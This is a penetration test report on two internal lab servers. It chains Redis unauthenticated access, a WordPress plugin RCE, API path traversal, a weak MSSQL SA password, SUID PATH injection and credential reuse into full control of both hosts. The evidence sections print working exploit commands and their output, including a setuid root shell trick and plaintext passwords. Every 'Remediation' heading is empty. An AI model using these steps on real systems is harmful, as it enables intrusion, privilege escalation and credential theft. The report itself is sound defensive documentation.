Penetration Test Report

Client: Internal Lab Environment
Scope: 192.168.1.101, 192.168.1.102
Test Period: 2026-05-12
Test Type: Black-box / Internal
Report Date: 2026-05-12
Version: v1.0 (Confidential)

Executive Summary

This penetration test assessed two internal servers — a Linux web server (192.168.1.101) and a Windows database server (192.168.1.102). Testing identified 8 security vulnerabilities: 3 Critical, 2 High, 2 Medium, 1 Low.

The most severe finding is Redis Unauthenticated Access (F-001), which allowed an attacker to gain direct SSH access to the web server without any credentials. Combined with a misconfigured SUID binary and credential reuse between systems, an attacker achieved full administrative control over both servers.

The complete attack chain: unauthenticated Redis → SSH shell → path traversal to read credentials → MSSQL SA access → credential reuse → Windows admin. No credentials were required to begin this chain.

Key Recommendations

  1. Immediately require authentication on Redis and bind to localhost (F-001)
  2. Patch WordPress Backup Migration plugin to v1.3.8+ (F-002)
  3. Fix path traversal in Express API file endpoint (F-003)
  4. Rotate ALL exposed credentials, enforce unique passwords per service (F-004, F-007)

Scope

Category      Detail
------------  ------------------------------------------------------------------
In-Scope      192.168.1.101 (websrv01.corpnet.local) — Linux web server
              192.168.1.102 (dbsrv01.corpnet.local) — Windows database server
Out-of-Scope  Other hosts on 192.168.1.0/24; AD domain controller (if separate)
Constraints   Full testing authorized, full depth, exploitation approved

Vulnerability Summary

ID     Vulnerability                         Risk      Affected Asset          CVSS
-----  ------------------------------------  --------  ----------------------  ----
F-001  Redis Unauthenticated Access          Critical  192.168.1.101:6379      9.8
F-002  WordPress Plugin RCE (CVE-2023-6553)  Critical  192.168.1.101:80        9.8
F-003  API Path Traversal                    Critical  192.168.1.101:8080      9.1
F-004  MSSQL SA Weak Password                High      192.168.1.102:1433      8.1
F-005  SUID Binary Privilege Escalation      High      192.168.1.101 (local)   7.8
F-006  SMB Signing Disabled                  Medium    192.168.1.102:445       5.3
F-007  Cross-Service Credential Reuse        Medium    192.168.1.102           6.5
F-008  WordPress Weak Admin Password         Low       192.168.1.101:80        3.1

Attack Chain

  1. Redis no-auth (F-001) — Connected without credentials, injected SSH public key via CONFIG SET, gained shell as redis user on 192.168.1.101
  2. SUID path injection (F-005) — Exploited /usr/local/bin/backup_tool, which calls system("tar ...") without an absolute path. Escalated to root on 192.168.1.101
  3. Path traversal (F-003) — Read /opt/app/config.json via /api/v1/files/../../../../opt/app/config.json, obtaining MSSQL SA credentials
  4. MSSQL xp_cmdshell (F-004) — Logged in as SA with the discovered password, enabled xp_cmdshell, gained shell as nt service\mssqlserver on 192.168.1.102
  5. Credential reuse (F-007) — CORPNET\sqlsvc shares the SA password. WinRM access with local admin privileges on 192.168.1.102
  6. Secret extraction — Used impacket-secretsdump to extract SAM hashes, LSA Secrets, and cached domain credentials from 192.168.1.102

Vulnerability Details

F-001 Redis Unauthenticated Access (Critical)
Location: 192.168.1.101:6379
CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-306
Type: Missing Authentication

The Redis instance requires no authentication and is bound to all interfaces. The CONFIG command is unrestricted, allowing arbitrary filesystem writes — including SSH authorized_keys injection.

Evidence

$ redis-cli -h 192.168.1.101 ping
PONG
$ redis-cli -h 192.168.1.101 CONFIG GET requirepass
1) "requirepass"
2) ""
$ redis-cli -h 192.168.1.101 CONFIG SET dir /var/lib/redis/.ssh
OK
$ redis-cli -h 192.168.1.101 CONFIG SET dbfilename authorized_keys
OK
$ ssh -i pentest_key redis@192.168.1.101 id
uid=110(redis) gid=115(redis) groups=115(redis)

Remediation

F-002 WordPress Plugin RCE — CVE-2023-6553 (Critical)
Location: 192.168.1.101:80 (backup-migration v1.3.7)
CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-94
Type: Unauthenticated Remote Code Execution

The Backup Migration plugin v1.3.7 allows unauthenticated PHP code injection. An attacker can execute arbitrary code on the server without any credentials.

Evidence

$ wpscan --url http://192.168.1.101 --enumerate ap
[+] backup-migration
 | Version: 1.3.7
 | [!] Title: Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
 | Fixed in: 1.3.8
 | References:
 |  - https://nvd.nist.gov/vuln/detail/CVE-2023-6553

Remediation

F-003 API Path Traversal — Arbitrary File Read (Critical)
Location: GET http://192.168.1.101:8080/api/v1/files/(unknown)
CVSS: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-22
Type: Path Traversal

The Express API file endpoint does not sanitize path parameters. Directory traversal sequences read arbitrary files, including credentials that enabled lateral movement to the Windows server.

Evidence

$ curl -s --path-as-is http://192.168.1.101:8080/api/v1/files/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
...

$ curl -s --path-as-is http://192.168.1.101:8080/api/v1/files/../../../../opt/app/config.json
{"mssql_mirror":{"host":"192.168.1.102","user":"sa","password":"SQLServer2024!"}}

Remediation

F-004 MSSQL SA Weak Password (High)
Location: 192.168.1.102:1433
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
CWE: CWE-521
Type: Weak Password

The MSSQL SA account uses a predictable password found in plaintext configuration. SA has sysadmin privileges enabling OS command execution via xp_cmdshell.

Evidence

$ impacket-mssqlclient sa:'SQLServer2024!'@192.168.1.102
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
          1
SQL> EXEC xp_cmdshell 'whoami'
nt service\mssqlserver

Remediation

F-005 SUID Binary Privilege Escalation (High)
Location: 192.168.1.101:/usr/local/bin/backup_tool
CVSS: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-426
Type: Untrusted Search Path

A custom SUID root binary calls system("tar ...") without an absolute path, enabling PATH injection to execute arbitrary commands as root.

Evidence

$ strings /usr/local/bin/backup_tool | grep tar
tar -czf /tmp/backup.tar.gz %s
$ echo '#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /tmp/tar
$ chmod +x /tmp/tar && PATH=/tmp:$PATH /usr/local/bin/backup_tool /etc/hosts
$ /tmp/rootbash -p -c "id"
uid=110(redis) gid=115(redis) euid=0(root) egid=0(root)

Remediation

F-006 SMB Signing Disabled (Medium)
Location: 192.168.1.102:445
CVSS: 5.3 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-311
Type: Insecure Protocol Configuration

SMB signing is not required, enabling NTLM relay attacks.

Evidence

$ nxc smb 192.168.1.102
SMB  192.168.1.102  445  DBSRV01  [*] (signing:False)

Remediation

F-007 Cross-Service Credential Reuse (Medium)
Location: 192.168.1.102 (MSSQL ↔ WinRM)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-255
Type: Credential Reuse

The domain account CORPNET\sqlsvc uses the same password as the MSSQL SA account, which granted WinRM access with local administrator privileges on 192.168.1.102.

Evidence

$ nxc winrm 192.168.1.102 -u 'sqlsvc' -p 'SQLServer2024!'
WINRM  192.168.1.102  5985  DBSRV01  [+] CORPNET\sqlsvc:SQLServer2024! (Pwn3d!)

Remediation

F-008 WordPress Weak Admin Password (Low)
Location: http://192.168.1.101/wp-login.php
CVSS: 3.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)
CWE: CWE-521
Type: Weak Password

The WordPress admin account uses admin123, cracked within the top 10,000 common passwords via XML-RPC brute-force.

Remediation

Negative Results

Service             Test                                Result
------------------  ----------------------------------  ---------------------------------------
SSH (.101)          Weak ciphers, default credentials   Modern config, no default creds
FTP (.101)          Sensitive files, writable dirs      Anonymous read only, no sensitive files
MySQL (.101)        Remote access                       ACL properly restricts to localhost
PostgreSQL (.101)   Remote access                       pg_hba.conf properly restricts
DNS (.102)          Zone transfer                       Properly denied
SNMP (.101, .102)   Community string brute-force        Not accessible
RDP (.102)          Weak encryption, NLA bypass         NLA enabled, encryption adequate
SSL/TLS (.101)      Known vulnerabilities               No HEARTBLEED, POODLE, ROBOT, etc.
IIS (.102:8443)     Default credentials, traversal      Login required, no findings

Remediation Priority

Priority        Finding                                 Effort                Impact
--------------  --------------------------------------  --------------------  ------------------------------------------------------
1 (Immediate)   F-001: Redis auth + bind localhost      Low (config change)   Blocks entire attack chain entry point
2 (Immediate)   F-003: Fix API path traversal           Low (code fix)        Prevents credential exposure → blocks lateral movement
3 (Immediate)   F-002: Update WP plugin                 Low (plugin update)   Eliminates unauthenticated RCE
4 (This week)   F-004 + F-007: Rotate all credentials   Medium                Invalidates all discovered credentials, breaks reuse
5 (This week)   F-005: Fix SUID binary                  Low (recompile)       Prevents privilege escalation
6 (This month)  F-006: Enable SMB signing               Medium (GPO)          Prevents relay attacks
7 (This month)  F-008: WP password policy               Low                   Prevents brute-force access

Tools Used

Tool            Version   Purpose
--------------  --------  ----------------------------------------------
nmap            7.94      Port scanning, service detection, NSE scripts
arp-scan        1.10.0    ARP-based host discovery
redis-cli       7.0.15    Redis interaction and exploitation
nuclei          3.2.0     Template-based vulnerability scanning
nikto           2.5.0     Web server vulnerability scanning
testssl.sh      3.2       SSL/TLS security audit
whatweb         0.5.5     Web technology fingerprinting
wafw00f         2.2.0     WAF detection
ffuf            2.1.0     Directory/API endpoint discovery
wpscan          3.8.25    WordPress vulnerability scanning
enum4linux-ng   1.3.0     SMB/NetBIOS enumeration
smbmap          1.10.2    SMB share permission enumeration
netexec (nxc)   1.1.0     Multi-protocol credential testing
impacket        0.12.0    Windows protocol exploitation
evil-winrm      3.5       WinRM shell access
onesixtyone     0.3.4     SNMP community string brute-force